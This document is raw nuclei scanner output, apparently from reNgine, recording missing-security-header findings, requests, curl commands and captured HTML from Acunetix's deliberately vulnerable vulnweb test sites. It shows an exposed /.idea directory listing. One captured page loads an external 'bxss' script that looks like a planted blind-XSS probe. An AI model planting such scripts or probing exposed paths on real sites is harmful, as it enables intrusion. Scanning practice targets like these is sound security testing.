href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:57.395342603Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:57.697121665Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:58.262554295Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:58.787645504Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n 